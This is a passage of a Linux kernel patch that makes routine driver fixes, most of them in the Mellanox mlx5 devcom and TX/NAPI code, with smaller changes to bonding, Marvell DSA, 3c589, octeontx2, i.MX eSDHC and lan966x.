+ 					esdhc_hs400_enhanced_strobe;
+@@ -1710,6 +1708,10 @@ static int sdhci_esdhc_imx_probe(struct platform_device *pdev)
+ 			goto disable_ahb_clk;
+ 	}
+ 
++	err = sdhci_esdhc_imx_probe_dt(pdev, host, imx_data);
++	if (err)
++		goto disable_ahb_clk;
++
+ 	sdhci_esdhc_imx_hwinit(host);
+ 
+ 	err = sdhci_add_host(host);
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 9f44c86a591dd..9ed80f7106515 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -3921,7 +3921,11 @@ static int bond_slave_netdev_event(unsigned long event,
+ 		unblock_netpoll_tx();
+ 		break;
+ 	case NETDEV_FEAT_CHANGE:
+-		bond_compute_features(bond);
++		if (!bond->notifier_ctx) {
++			bond->notifier_ctx = true;
++			bond_compute_features(bond);
++			bond->notifier_ctx = false;
++		}
+ 		break;
+ 	case NETDEV_RESEND_IGMP:
+ 		/* Propagate to master device */
+@@ -6284,6 +6288,8 @@ static int bond_init(struct net_device *bond_dev)
+ 	if (!bond->wq)
+ 		return -ENOMEM;
+ 
++	bond->notifier_ctx = false;
++
+ 	spin_lock_init(&bond->stats_lock);
+ 	netdev_lockdep_set_classes(bond_dev);
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 12175195d3968..a8ff6ee6d58e6 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5044,6 +5044,7 @@ static const struct mv88e6xxx_ops mv88e6320_ops = {
+ 	.phy_write = mv88e6xxx_g2_smi_phy_write,
+ 	.port_set_link = mv88e6xxx_port_set_link,
+ 	.port_sync_link = mv88e6xxx_port_sync_link,
++	.port_set_rgmii_delay = mv88e6320_port_set_rgmii_delay,
+ 	.port_set_speed_duplex = mv88e6185_port_set_speed_duplex,
+ 	.port_tag_remap = mv88e6095_port_tag_remap,
+ 	.port_set_frame_mode = mv88e6351_port_set_frame_mode,
+@@ -5088,6 +5089,7 @@ static const struct mv88e6xxx_ops mv88e6321_ops = {
+ 	.phy_write = mv88e6xxx_g2_smi_phy_write,
+ 	.port_set_link = mv88e6xxx_port_set_link,
+ 	.port_sync_link = mv88e6xxx_port_sync_link,
++	.port_set_rgmii_delay = mv88e6320_port_set_rgmii_delay,
+ 	.port_set_speed_duplex = mv88e6185_port_set_speed_duplex,
+ 	.port_tag_remap = mv88e6095_port_tag_remap,
+ 	.port_set_frame_mode = mv88e6351_port_set_frame_mode,
+diff --git a/drivers/net/dsa/mv88e6xxx/port.c b/drivers/net/dsa/mv88e6xxx/port.c
+index 5c4195c635b0f..f79cf716c541f 100644
+--- a/drivers/net/dsa/mv88e6xxx/port.c
++++ b/drivers/net/dsa/mv88e6xxx/port.c
+@@ -133,6 +133,15 @@ int mv88e6390_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
+ 	return mv88e6xxx_port_set_rgmii_delay(chip, port, mode);
+ }
+ 
++int mv88e6320_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
++				   phy_interface_t mode)
++{
++	if (port != 2 && port != 5 && port != 6)
++		return -EOPNOTSUPP;
++
++	return mv88e6xxx_port_set_rgmii_delay(chip, port, mode);
++}
++
+ int mv88e6xxx_port_set_link(struct mv88e6xxx_chip *chip, int port, int link)
+ {
+ 	u16 reg;
+diff --git a/drivers/net/dsa/mv88e6xxx/port.h b/drivers/net/dsa/mv88e6xxx/port.h
+index a91e22d9a6cb3..d19b6303b91f0 100644
+--- a/drivers/net/dsa/mv88e6xxx/port.h
++++ b/drivers/net/dsa/mv88e6xxx/port.h
+@@ -332,6 +332,8 @@ int mv88e6xxx_port_wait_bit(struct mv88e6xxx_chip *chip, int port, int reg,
+ 
+ int mv88e6185_port_set_pause(struct mv88e6xxx_chip *chip, int port,
+ 			     int pause);
++int mv88e6320_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
++				   phy_interface_t mode);
+ int mv88e6352_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
+ 				   phy_interface_t mode);
+ int mv88e6390_port_set_rgmii_delay(struct mv88e6xxx_chip *chip, int port,
+diff --git a/drivers/net/ethernet/3com/3c589_cs.c b/drivers/net/ethernet/3com/3c589_cs.c
+index 82f94b1635bf8..5267e9dcd87ef 100644
+--- a/drivers/net/ethernet/3com/3c589_cs.c
++++ b/drivers/net/ethernet/3com/3c589_cs.c
+@@ -195,6 +195,7 @@ static int tc589_probe(struct pcmcia_device *link)
+ {
+ 	struct el3_private *lp;
+ 	struct net_device *dev;
++	int ret;
+ 
+ 	dev_dbg(&link->dev, "3c589_attach()\n");
+ 
+@@ -218,7 +219,15 @@ static int tc589_probe(struct pcmcia_device *link)
+ 
+ 	dev->ethtool_ops = &netdev_ethtool_ops;
+ 
+-	return tc589_config(link);
++	ret = tc589_config(link);
++	if (ret)
++		goto err_free_netdev;
++
++	return 0;
++
++err_free_netdev:
++	free_netdev(dev);
++	return ret;
+ }
+ 
+ static void tc589_detach(struct pcmcia_device *link)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index 7045fedfd73a0..7af223b0a37f5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -652,9 +652,7 @@ static void otx2_sqe_add_ext(struct otx2_nic *pfvf, struct otx2_snd_queue *sq,
+ 				htons(ext->lso_sb - skb_network_offset(skb));
+ 		} else if (skb_shinfo(skb)->gso_type & SKB_GSO_TCPV6) {
+ 			ext->lso_format = pfvf->hw.lso_tsov6_idx;
+-
+-			ipv6_hdr(skb)->payload_len =
+-				htons(ext->lso_sb - skb_network_offset(skb));
++			ipv6_hdr(skb)->payload_len = htons(tcp_hdrlen(skb));
+ 		} else if (skb_shinfo(skb)->gso_type & SKB_GSO_UDP_L4) {
+ 			__be16 l3_proto = vlan_get_protocol(skb);
+ 			struct udphdr *udph = udp_hdr(skb);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+index 723891eb86eec..b3253e263ebc8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+@@ -1894,9 +1894,10 @@ static void mlx5_cmd_err_trace(struct mlx5_core_dev *dev, u16 opcode, u16 op_mod
+ static void cmd_status_log(struct mlx5_core_dev *dev, u16 opcode, u8 status,
+ 			   u32 syndrome, int err)
+ {
++	const char *namep = mlx5_command_str(opcode);
+ 	struct mlx5_cmd_stats *stats;
+ 
+-	if (!err)
++	if (!err || !(strcmp(namep, "unknown command opcode")))
+ 		return;
+ 
+ 	stats = &dev->cmd.stats[opcode];
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+index ae75e230170b5..efd02ce4425de 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+@@ -175,6 +175,8 @@ static bool mlx5e_ptp_poll_ts_cq(struct mlx5e_cq *cq, int budget)
+ 	/* ensure cq space is freed before enabling more cqes */
+ 	wmb();
+ 
++	mlx5e_txqsq_wake(&ptpsq->txqsq);
++
+ 	return work_done == budget;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+index 2aaf8ab857b8f..72b61f66df37a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+@@ -1338,11 +1338,13 @@ static void mlx5e_invalidate_encap(struct mlx5e_priv *priv,
+ 	struct mlx5e_tc_flow *flow;
+ 
+ 	list_for_each_entry(flow, encap_flows, tmp_list) {
+-		struct mlx5_flow_attr *attr = flow->attr;
+ 		struct mlx5_esw_flow_attr *esw_attr;
++		struct mlx5_flow_attr *attr;
+ 
+ 		if (!mlx5e_is_offloaded_flow(flow))
+ 			continue;
++
++		attr = mlx5e_tc_get_encap_attr(flow);
+ 		esw_attr = attr->esw_attr;
+ 
+ 		if (flow_flag_test(flow, SLOW))
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+index 1b3a65325ece1..344245c01150b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+@@ -177,6 +177,8 @@ static inline u16 mlx5e_txqsq_get_next_pi(struct mlx5e_txqsq *sq, u16 size)
+ 	return pi;
+ }
+ 
++void mlx5e_txqsq_wake(struct mlx5e_txqsq *sq);
++
+ static inline u16 mlx5e_shampo_get_cqe_header_index(struct mlx5e_rq *rq, struct mlx5_cqe64 *cqe)
+ {
+ 	return be16_to_cpu(cqe->shampo.header_entry_index) & (rq->mpwqe.shampo->hd_per_wq - 1);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 73af062a87830..7883b625634fb 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -1578,11 +1578,9 @@ bool mlx5e_tc_is_vf_tunnel(struct net_device *out_dev, struct net_device *route_
+ int mlx5e_tc_query_route_vport(struct net_device *out_dev, struct net_device *route_dev, u16 *vport)
+ {
+ 	struct mlx5e_priv *out_priv, *route_priv;
+-	struct mlx5_devcom *devcom = NULL;
+ 	struct mlx5_core_dev *route_mdev;
+ 	struct mlx5_eswitch *esw;
+ 	u16 vhca_id;
+-	int err;
+ 
+ 	out_priv = netdev_priv(out_dev);
+ 	esw = out_priv->mdev->priv.eswitch;
+@@ -1591,6 +1589,9 @@ int mlx5e_tc_query_route_vport(struct net_device *out_dev, struct net_device *ro
+ 
+ 	vhca_id = MLX5_CAP_GEN(route_mdev, vhca_id);
+ 	if (mlx5_lag_is_active(out_priv->mdev)) {
++		struct mlx5_devcom *devcom;
++		int err;
++
+ 		/* In lag case we may get devices from different eswitch instances.
+ 		 * If we failed to get vport num, it means, mostly, that we on the wrong
+ 		 * eswitch.
+@@ -1599,16 +1600,16 @@ int mlx5e_tc_query_route_vport(struct net_device *out_dev, struct net_device *ro
+ 		if (err != -ENOENT)
+ 			return err;
+ 
++		rcu_read_lock();
+ 		devcom = out_priv->mdev->priv.devcom;
+-		esw = mlx5_devcom_get_peer_data(devcom, MLX5_DEVCOM_ESW_OFFLOADS);
+-		if (!esw)
+-			return -ENODEV;
++		esw = mlx5_devcom_get_peer_data_rcu(devcom, MLX5_DEVCOM_ESW_OFFLOADS);
++		err = esw ? mlx5_eswitch_vhca_id_to_vport(esw, vhca_id, vport) : -ENODEV;
++		rcu_read_unlock();
++
++		return err;
+ 	}
+ 
+-	err = mlx5_eswitch_vhca_id_to_vport(esw, vhca_id, vport);
+-	if (devcom)
+-		mlx5_devcom_release_peer_data(devcom, MLX5_DEVCOM_ESW_OFFLOADS);
+-	return err;
++	return mlx5_eswitch_vhca_id_to_vport(esw, vhca_id, vport);
+ }
+ 
+ int mlx5e_tc_add_flow_mod_hdr(struct mlx5e_priv *priv,
+@@ -5142,6 +5143,8 @@ int mlx5e_tc_esw_init(struct mlx5_rep_uplink_priv *uplink_priv)
+ 		goto err_register_fib_notifier;
+ 	}
+ 
++	mlx5_esw_offloads_devcom_init(esw);
++
+ 	return 0;
+ 
+ err_register_fib_notifier:
+@@ -5168,7 +5171,7 @@ void mlx5e_tc_esw_cleanup(struct mlx5_rep_uplink_priv *uplink_priv)
+ 	priv = netdev_priv(rpriv->netdev);
+ 	esw = priv->mdev->priv.eswitch;
+ 
+-	mlx5e_tc_clean_fdb_peer_flows(esw);
++	mlx5_esw_offloads_devcom_cleanup(esw);
+ 
+ 	mlx5e_tc_tun_cleanup(uplink_priv->encap);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
+index f7897ddb29c52..a6d7e2cfcd0e1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tx.c
+@@ -777,6 +777,17 @@ static void mlx5e_tx_wi_consume_fifo_skbs(struct mlx5e_txqsq *sq, struct mlx5e_t
+ 	}
+ }
+ 
++void mlx5e_txqsq_wake(struct mlx5e_txqsq *sq)
++{
++	if (netif_tx_queue_stopped(sq->txq) &&
++	    mlx5e_wqc_has_room_for(&sq->wq, sq->cc, sq->pc, sq->stop_room) &&
++	    mlx5e_ptpsq_fifo_has_room(sq) &&
++	    !test_bit(MLX5E_SQ_STATE_RECOVERING, &sq->state)) {
++		netif_tx_wake_queue(sq->txq);
++		sq->stats->wake++;
++	}
++}
++
+ bool mlx5e_poll_tx_cq(struct mlx5e_cq *cq, int napi_budget)
+ {
+ 	struct mlx5e_sq_stats *stats;
+@@ -876,13 +887,7 @@ bool mlx5e_poll_tx_cq(struct mlx5e_cq *cq, int napi_budget)
+ 
+ 	netdev_tx_completed_queue(sq->txq, npkts, nbytes);
+ 
+-	if (netif_tx_queue_stopped(sq->txq) &&
+-	    mlx5e_wqc_has_room_for(&sq->wq, sq->cc, sq->pc, sq->stop_room) &&
+-	    mlx5e_ptpsq_fifo_has_room(sq) &&
+-	    !test_bit(MLX5E_SQ_STATE_RECOVERING, &sq->state)) {
+-		netif_tx_wake_queue(sq->txq);
+-		stats->wake++;
+-	}
++	mlx5e_txqsq_wake(sq);
+ 
+ 	return (i == MLX5E_TX_CQ_POLL_BUDGET);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c
+index 9a458a5d98539..44547b22a536f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c
+@@ -161,20 +161,22 @@ int mlx5e_napi_poll(struct napi_struct *napi, int budget)
+ 		}
+ 	}
+ 
++	/* budget=0 means we may be in IRQ context, do as little as possible */
++	if (unlikely(!budget))
++		goto out;
++
+ 	busy |= mlx5e_poll_xdpsq_cq(&c->xdpsq.cq);
+ 
+ 	if (c->xdp)
+ 		busy |= mlx5e_poll_xdpsq_cq(&c->rq_xdpsq.cq);
+ 
+-	if (likely(budget)) { /* budget=0 means: don't poll rx rings */
+-		if (xsk_open)
+-			work_done = mlx5e_poll_rx_cq(&xskrq->cq, budget);
++	if (xsk_open)
++		work_done = mlx5e_poll_rx_cq(&xskrq->cq, budget);
+ 
+-		if (likely(budget - work_done))
+-			work_done += mlx5e_poll_rx_cq(&rq->cq, budget - work_done);
++	if (likely(budget - work_done))
++		work_done += mlx5e_poll_rx_cq(&rq->cq, budget - work_done);
+ 
+-		busy |= work_done == budget;
+-	}
++	busy |= work_done == budget;
+ 
+ 	mlx5e_poll_ico_cq(&c->icosq.cq);
+ 	if (mlx5e_poll_ico_cq(&c->async_icosq.cq))
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 6e6e0864063f1..821c78bab3732 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -368,6 +368,8 @@ int mlx5_eswitch_enable(struct mlx5_eswitch *esw, int num_vfs);
+ void mlx5_eswitch_disable_sriov(struct mlx5_eswitch *esw, bool clear_vf);
+ void mlx5_eswitch_disable_locked(struct mlx5_eswitch *esw);
+ void mlx5_eswitch_disable(struct mlx5_eswitch *esw);
++void mlx5_esw_offloads_devcom_init(struct mlx5_eswitch *esw);
++void mlx5_esw_offloads_devcom_cleanup(struct mlx5_eswitch *esw);
+ int mlx5_eswitch_set_vport_mac(struct mlx5_eswitch *esw,
+ 			       u16 vport, const u8 *mac);
+ int mlx5_eswitch_set_vport_state(struct mlx5_eswitch *esw,
+@@ -757,6 +759,8 @@ static inline void mlx5_eswitch_cleanup(struct mlx5_eswitch *esw) {}
+ static inline int mlx5_eswitch_enable(struct mlx5_eswitch *esw, int num_vfs) { return 0; }
+ static inline void mlx5_eswitch_disable_sriov(struct mlx5_eswitch *esw, bool clear_vf) {}
+ static inline void mlx5_eswitch_disable(struct mlx5_eswitch *esw) {}
++static inline void mlx5_esw_offloads_devcom_init(struct mlx5_eswitch *esw) {}
++static inline void mlx5_esw_offloads_devcom_cleanup(struct mlx5_eswitch *esw) {}
+ static inline bool mlx5_eswitch_is_funcs_handler(struct mlx5_core_dev *dev) { return false; }
+ static inline
+ int mlx5_eswitch_set_vport_state(struct mlx5_eswitch *esw, u16 vport, int link_state) { return 0; }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 519526a4810ef..5235b5a7b9637 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -2864,7 +2864,7 @@ err_out:
+ 	return err;
+ }
+ 
+-static void esw_offloads_devcom_init(struct mlx5_eswitch *esw)
++void mlx5_esw_offloads_devcom_init(struct mlx5_eswitch *esw)
+ {
+ 	struct mlx5_devcom *devcom = esw->dev->priv.devcom;
+ 
+@@ -2887,7 +2887,7 @@ static void esw_offloads_devcom_init(struct mlx5_eswitch *esw)
+ 			       ESW_OFFLOADS_DEVCOM_PAIR, esw);
+ }
+ 
+-static void esw_offloads_devcom_cleanup(struct mlx5_eswitch *esw)
++void mlx5_esw_offloads_devcom_cleanup(struct mlx5_eswitch *esw)
+ {
+ 	struct mlx5_devcom *devcom = esw->dev->priv.devcom;
+ 
+@@ -3357,8 +3357,6 @@ int esw_offloads_enable(struct mlx5_eswitch *esw)
+ 	if (err)
+ 		goto err_vports;
+ 
+-	esw_offloads_devcom_init(esw);
+-
+ 	return 0;
+ 
+ err_vports:
+@@ -3399,7 +3397,6 @@ static int esw_offloads_stop(struct mlx5_eswitch *esw,
+ 
+ void esw_offloads_disable(struct mlx5_eswitch *esw)
+ {
+-	esw_offloads_devcom_cleanup(esw);
+ 	mlx5_eswitch_disable_pf_vf_vports(esw);
+ 	esw_offloads_unload_rep(esw, MLX5_VPORT_UPLINK);
+ 	esw_set_passing_vport_metadata(esw, false);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.c
+index adefde3ea9410..b7d779d08d837 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.c
+@@ -3,6 +3,7 @@
+ 
+ #include <linux/mlx5/vport.h>
+ #include "lib/devcom.h"
++#include "mlx5_core.h"
+ 
+ static LIST_HEAD(devcom_list);
+ 
+@@ -13,7 +14,7 @@ static LIST_HEAD(devcom_list);
+ 
+ struct mlx5_devcom_component {
+ 	struct {
+-		void *data;
++		void __rcu *data;
+ 	} device[MLX5_DEVCOM_PORTS_SUPPORTED];
+ 
+ 	mlx5_devcom_event_handler_t handler;
+@@ -77,6 +78,7 @@ struct mlx5_devcom *mlx5_devcom_register_device(struct mlx5_core_dev *dev)
+ 	if (MLX5_CAP_GEN(dev, num_lag_ports) != MLX5_DEVCOM_PORTS_SUPPORTED)
+ 		return NULL;
+ 
++	mlx5_dev_list_lock();
+ 	sguid0 = mlx5_query_nic_system_image_guid(dev);
+ 	list_for_each_entry(iter, &devcom_list, list) {
+ 		struct mlx5_core_dev *tmp_dev = NULL;
+@@ -102,8 +104,10 @@ struct mlx5_devcom *mlx5_devcom_register_device(struct mlx5_core_dev *dev)
+ 
+ 	if (!priv) {
+ 		priv = mlx5_devcom_list_alloc();
+-		if (!priv)
+-			return ERR_PTR(-ENOMEM);
++		if (!priv) {
++			devcom = ERR_PTR(-ENOMEM);
++			goto out;
++		}
+ 
+ 		idx = 0;
+ 		new_priv = true;
+@@ -112,13 +116,16 @@ struct mlx5_devcom *mlx5_devcom_register_device(struct mlx5_core_dev *dev)
+ 	priv->devs[idx] = dev;
+ 	devcom = mlx5_devcom_alloc(priv, idx);
+ 	if (!devcom) {
+-		kfree(priv);
+-		return ERR_PTR(-ENOMEM);
++		if (new_priv)
++			kfree(priv);
++		devcom = ERR_PTR(-ENOMEM);
++		goto out;
+ 	}
+ 
+ 	if (new_priv)
+ 		list_add(&priv->list, &devcom_list);
+-
++out:
++	mlx5_dev_list_unlock();
+ 	return devcom;
+ }
+ 
+@@ -131,6 +138,7 @@ void mlx5_devcom_unregister_device(struct mlx5_devcom *devcom)
+ 	if (IS_ERR_OR_NULL(devcom))
+ 		return;
+ 
++	mlx5_dev_list_lock();
+ 	priv = devcom->priv;
+ 	priv->devs[devcom->idx] = NULL;
+ 
+@@ -141,10 +149,12 @@ void mlx5_devcom_unregister_device(struct mlx5_devcom *devcom)
+ 			break;
+ 
+ 	if (i != MLX5_DEVCOM_PORTS_SUPPORTED)
+-		return;
++		goto out;
+ 
+ 	list_del(&priv->list);
+ 	kfree(priv);
++out:
++	mlx5_dev_list_unlock();
+ }
+ 
+ void mlx5_devcom_register_component(struct mlx5_devcom *devcom,
+@@ -162,7 +172,7 @@ void mlx5_devcom_register_component(struct mlx5_devcom *devcom,
+ 	comp = &devcom->priv->components[id];
+ 	down_write(&comp->sem);
+ 	comp->handler = handler;
+-	comp->device[devcom->idx].data = data;
++	rcu_assign_pointer(comp->device[devcom->idx].data, data);
+ 	up_write(&comp->sem);
+ }
+ 
+@@ -176,8 +186,9 @@ void mlx5_devcom_unregister_component(struct mlx5_devcom *devcom,
+ 
+ 	comp = &devcom->priv->components[id];
+ 	down_write(&comp->sem);
+-	comp->device[devcom->idx].data = NULL;
++	RCU_INIT_POINTER(comp->device[devcom->idx].data, NULL);
+ 	up_write(&comp->sem);
++	synchronize_rcu();
+ }
+ 
+ int mlx5_devcom_send_event(struct mlx5_devcom *devcom,
+@@ -193,12 +204,15 @@ int mlx5_devcom_send_event(struct mlx5_devcom *devcom,
+ 
+ 	comp = &devcom->priv->components[id];
+ 	down_write(&comp->sem);
+-	for (i = 0; i < MLX5_DEVCOM_PORTS_SUPPORTED; i++)
+-		if (i != devcom->idx && comp->device[i].data) {
+-			err = comp->handler(event, comp->device[i].data,
+-					    event_data);
++	for (i = 0; i < MLX5_DEVCOM_PORTS_SUPPORTED; i++) {
++		void *data = rcu_dereference_protected(comp->device[i].data,
++						       lockdep_is_held(&comp->sem));
++
++		if (i != devcom->idx && data) {
++			err = comp->handler(event, data, event_data);
+ 			break;
+ 		}
++	}
+ 
+ 	up_write(&comp->sem);
+ 	return err;
+@@ -213,7 +227,7 @@ void mlx5_devcom_set_paired(struct mlx5_devcom *devcom,
+ 	comp = &devcom->priv->components[id];
+ 	WARN_ON(!rwsem_is_locked(&comp->sem));
+ 
+-	comp->paired = paired;
++	WRITE_ONCE(comp->paired, paired);
+ }
+ 
+ bool mlx5_devcom_is_paired(struct mlx5_devcom *devcom,
+@@ -222,7 +236,7 @@ bool mlx5_devcom_is_paired(struct mlx5_devcom *devcom,
+ 	if (IS_ERR_OR_NULL(devcom))
+ 		return false;
+ 
+-	return devcom->priv->components[id].paired;
++	return READ_ONCE(devcom->priv->components[id].paired);
+ }
+ 
+ void *mlx5_devcom_get_peer_data(struct mlx5_devcom *devcom,
+@@ -236,7 +250,7 @@ void *mlx5_devcom_get_peer_data(struct mlx5_devcom *devcom,
+ 
+ 	comp = &devcom->priv->components[id];
+ 	down_read(&comp->sem);
+-	if (!comp->paired) {
++	if (!READ_ONCE(comp->paired)) {
+ 		up_read(&comp->sem);
+ 		return NULL;
+ 	}
+@@ -245,7 +259,29 @@ void *mlx5_devcom_get_peer_data(struct mlx5_devcom *devcom,
+ 		if (i != devcom->idx)
+ 			break;
+ 
+-	return comp->device[i].data;
++	return rcu_dereference_protected(comp->device[i].data, lockdep_is_held(&comp->sem));
++}
++
++void *mlx5_devcom_get_peer_data_rcu(struct mlx5_devcom *devcom, enum mlx5_devcom_components id)
++{
++	struct mlx5_devcom_component *comp;
++	int i;
++
++	if (IS_ERR_OR_NULL(devcom))
++		return NULL;
++
++	for (i = 0; i < MLX5_DEVCOM_PORTS_SUPPORTED; i++)
++		if (i != devcom->idx)
++			break;
++
++	comp = &devcom->priv->components[id];
++	/* This can change concurrently, however 'data' pointer will remain
++	 * valid for the duration of RCU read section.
++	 */
++	if (!READ_ONCE(comp->paired))
++		return NULL;
++
++	return rcu_dereference(comp->device[i].data);
+ }
+ 
+ void mlx5_devcom_release_peer_data(struct mlx5_devcom *devcom,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.h b/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.h
+index 94313c18bb647..9a496f4722dad 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.h
+@@ -41,6 +41,7 @@ bool mlx5_devcom_is_paired(struct mlx5_devcom *devcom,
+ 
+ void *mlx5_devcom_get_peer_data(struct mlx5_devcom *devcom,
+ 				enum mlx5_devcom_components id);
++void *mlx5_devcom_get_peer_data_rcu(struct mlx5_devcom *devcom, enum mlx5_devcom_components id);
+ void mlx5_devcom_release_peer_data(struct mlx5_devcom *devcom,
+ 				   enum mlx5_devcom_components id);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index cc8057c4f9080..91724c5450a05 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1024,7 +1024,7 @@ static int mlx5_init_once(struct mlx5_core_dev *dev)
+ 
+ 	dev->dm = mlx5_dm_create(dev);
+ 	if (IS_ERR(dev->dm))
+-		mlx5_core_warn(dev, "Failed to init device memory%d\n", err);
++		mlx5_core_warn(dev, "Failed to init device memory %ld\n", PTR_ERR(dev->dm));
+ 
+ 	dev->tracer = mlx5_fw_tracer_create(dev);
+ 	dev->hv_vhca = mlx5_hv_vhca_create(dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
+index 16d65fe4f654a..84364691a3791 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
+@@ -117,6 +117,8 @@ int mlx5dr_cmd_query_device(struct mlx5_core_dev *mdev,
+ 	caps->gvmi		= MLX5_CAP_GEN(mdev, vhca_id);
+ 	caps->flex_protocols	= MLX5_CAP_GEN(mdev, flex_parser_protocols);
+ 	caps->sw_format_ver	= MLX5_CAP_GEN(mdev, steering_format_version);
++	caps->roce_caps.fl_rc_qp_when_roce_disabled =
++		MLX5_CAP_GEN(mdev, fl_rc_qp_when_roce_disabled);
+ 
+ 	if (MLX5_CAP_GEN(mdev, roce)) {
+ 		err = dr_cmd_query_nic_vport_roce_en(mdev, 0, &roce_en);
+@@ -124,7 +126,7 @@ int mlx5dr_cmd_query_device(struct mlx5_core_dev *mdev,
+ 			return err;
+ 
+ 		caps->roce_caps.roce_en = roce_en;
+-		caps->roce_caps.fl_rc_qp_when_roce_disabled =
++		caps->roce_caps.fl_rc_qp_when_roce_disabled |=
+ 			MLX5_CAP_ROCE(mdev, fl_rc_qp_when_roce_disabled);
+ 		caps->roce_caps.fl_rc_qp_when_roce_enabled =
+ 			MLX5_CAP_ROCE(mdev, fl_rc_qp_when_roce_enabled);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_ste.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_ste.c
+index 09ebd3088857b..7815a629d7e1a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_ste.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_ste.c
+@@ -15,7 +15,8 @@ static u32 dr_ste_crc32_calc(const void *input_data, size_t length)
+ {
+ 	u32 crc = crc32(0, input_data, length);
+ 
+-	return (__force u32)htonl(crc);
++	return (__force u32)((crc >> 24) & 0xff) | ((crc << 8) & 0xff0000) |
++			    ((crc >> 8) & 0xff00) | ((crc << 24) & 0xff000000);
+ }
+ 
+ bool mlx5dr_ste_supp_ttl_cs_recalc(struct mlx5dr_cmd_caps *caps)
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_main.c b/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
+index 569108c49cbc5..9ce46588aaf03 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
+@@ -987,6 +987,16 @@ static int lan966x_reset_switch(struct lan966x *lan966x)
+ 
+ 	reset_control_reset(switch_reset);
+ 
++	/* Don't reinitialize the switch core, if it is already initialized. In
